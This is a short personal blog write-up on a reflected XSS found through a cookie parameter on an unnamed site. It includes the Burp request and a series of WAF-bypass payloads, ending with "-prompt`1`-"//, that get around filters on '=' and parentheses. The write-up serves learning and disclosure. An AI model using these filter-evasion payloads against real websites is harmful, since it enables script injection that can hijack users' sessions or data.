XSS “403 forbidden” bypass write up

Posted on by admin
Nur A Alam Dipu

Hello,

This is my second blog post and first write up about xss. I think there is no new things here that you can learn. If you see “akita” or “rahul-maini” blog you can learn more than this. This is just a part of learning from those wite up post.

Okay lets start.

Recent I found a cookie injection in a private site that is reflected something in a cookie parameter.

In regular way I check all the parameter, input something like “xxxx”. I noticed in burp reapeater cookie “GA_countryCode=xxx” reflected in code function.

GET /my/refer/welcome?rt=6bjzl0zEmBiPl0IQRSeN&cid=111&channel=1151 HTTP/1.1
Host: www.vuln.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: RT=6bjzl0zEmBiPl0IQRSeN5wxxx; GA_countryCode=GBxxxxxx”; GA_currentDomain=www.vuln.co.uk; feature_rollercoaster_upload=0; ABTasty=uid%3D18042509351658083%26fst%3D1524627317406%26pst%3Dnull%26cst%3D1524627317406%26ns%3D1%26pvt%3D1%26pvis%3D1%26th%3D;

‘session_status’ : “session_defined”,
‘page_name’ : pageName,
‘page_category’ : ‘My Account’,
‘country_code’ : “GBxxxxxx”,
‘ua’ : “UA-48172145–1”,
‘current_domain’ : window.location.host,
‘Cookie_Timeout’ : “2592000000”,
‘channel_id’ : “1151”,

Then I checked “><svg/onload> and its also reflected.

page_name’ : pageName,
‘page_category’ : ‘My Account’,
‘country_code’ : “GB”><svg/onload>”,
‘ua’ : “UA-48172145–1”,
‘current_domain’ : window.location.host,
‘Cookie_Timeout’ : “2592000000”,
‘channel_id’ : “1151”

Now the problem is comes up, when I try “><svg/onload=>, “=” blocked.

Then I used some technique that I learned from brutelogic blog. I noticed alert is okay, no blocked only “=” is blocked. Then I used playload Like “><svg/on</script>laod=alert> and saw that was bypassed and reflected.

Then try with “><svg/on</script>load=alert(1)> “()” bracket blocked, then used “. “><svg/on</script>load=alert`1`> its fine.

But no pop up. As all are bypassed, so I was confirmed its possible to trigger xss. I try many other way to pop up, but failed. Because many restiction, “Access Denied HTTP/1.1 403 Forbidden” and ip blocked.

Then I make a shortcut playload Like “-prompt`1`-”//. And it worked. 🙂

Xss done!!

For this simple playload, it takes a long time. 🙁

For sure there was a possible way to bypass with normal playload, but i didn’t try more. Less knowledge can’t think more.

Sorry for my bad English.

Thanks for reading.